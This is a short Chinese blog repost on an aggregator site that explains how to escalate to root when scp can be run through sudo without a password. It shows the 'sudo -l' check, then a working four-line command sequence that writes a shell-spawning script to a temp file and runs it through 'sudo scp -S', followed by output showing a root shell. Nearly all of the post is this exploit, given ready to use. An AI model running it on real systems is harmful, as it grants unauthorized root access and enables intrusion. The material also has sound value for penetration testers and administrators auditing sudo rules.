文章首页 Web开发 Windows开发 编程语言 数据库技术 移动平台 系统服务 微信 设计 布布扣 其他

sudo-scp提权

时间:2021-03-31 19:22:05   收藏:0   阅读:32

当scp命令有免密sudo的权限时,可以用来进行提权到其他账号

1、确认scp有sudo免密权限

test@test:~$ sudo -l
sudo -l
Matching Defaults entries for test on test:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hacksudo may run the following commands on test:
    (root) NOPASSWD: /usr/bin/scp

2、输入下列命令,即可完成提权

$ TF=$(mktemp)
$ echo sh 0<&2 1>&2 > $TF
$ chmod +x "$TF"
$ sudo scp -S $TF x y:

id
uid=0(root) gid=0(root) groups=0(root)

 

原文:https://www.cnblogs.com/zlgxzswjy/p/14603174.html

评论(0
© 2014 bubuko.com 版权所有 - 联系我们:wmxa8@hotmail.com
打开技术之扣,分享程序人生!